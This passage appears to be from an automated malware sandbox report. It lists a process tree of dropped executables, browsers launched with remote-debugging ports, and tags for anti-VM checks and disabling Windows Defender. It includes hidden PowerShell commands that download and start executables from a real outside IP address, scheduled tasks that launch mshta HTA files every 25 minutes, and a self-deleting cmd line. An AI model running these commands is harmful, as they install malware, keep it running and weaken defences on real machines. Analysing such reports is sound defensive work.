        PID:3968
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3380 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2252
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:8
        5⤵
        
        PID:1432
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4668 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:8
        5⤵
        
        PID:4916
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4232 /prefetch:8
        5⤵
        
        PID:4924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4904,i,8868702774617079160,8346906083605919566,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8
        5⤵
        
        PID:4468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4984
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa21014718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        5⤵
        
        PID:1112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2972
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
        5⤵
        
        PID:2064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3688
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,14960686596430332090,1190761001296471339,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2388
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\d2dbi" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:5916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2340
- - C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3696
- - C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
    "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
    "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5000
- - C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
    "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4072
    - - C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000170101\video.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1236
- - C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe
    "C:\Users\Admin\AppData\Local\Temp\1090673001\e521e66b6b.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:5108
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6700
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5800
- - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
    "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:408
  - - C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
      "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
      4⤵
      PID:1252
- - C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3336
- - C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe
    "C:\Users\Admin\AppData\Local\Temp\1091274101\36c0490467.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:5324
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5364
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn JmLyfmaJCXv /tr "mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5440
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\IJPKXFOGg.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:5372
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'L2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5516
      - C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
        
        "C:\Users\Admin\AppData\Local\TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5864
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
      4⤵
      System Location Discovery: System Language Discovery
      PID:5916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3024
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5216
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5692
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5868
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "ukW5wmaliqZ" /tr "mshta \"C:\Temp\uLU5RZ6Si.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2612
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\uLU5RZ6Si.hta"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3884
- - C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe
    "C:\Users\Admin\AppData\Local\Temp\1091314001\9222c12528.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:5432
- - C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe
    "C:\Users\Admin\AppData\Local\Temp\1091315001\e984a62c31.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:3480
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      PID:6072
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa2100cc40,0x7ffa2100cc4c,0x7ffa2100cc58
        5⤵
        
        PID:5976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1928,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2044 /prefetch:2
        5⤵
        
        PID:1456
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1724,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2564 /prefetch:3
        5⤵
        
        PID:2084
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2072,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2516 /prefetch:8
        5⤵
        
        PID:4320
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4800
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3388 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5320
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4496 /prefetch:8
        5⤵
        
        PID:868
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4640 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1668
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:8
        5⤵
        
        PID:1732
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,1517956054448620368,17945307632392686653,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4908 /prefetch:8
        5⤵
        
        PID:5832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa210146f8,0x7ffa21014708,0x7ffa21014718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        5⤵
        
        PID:6436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
        5⤵
        
        PID:6448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
        5⤵
        
        PID:6512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,9626069164308692466,692126561428286703,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6632
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
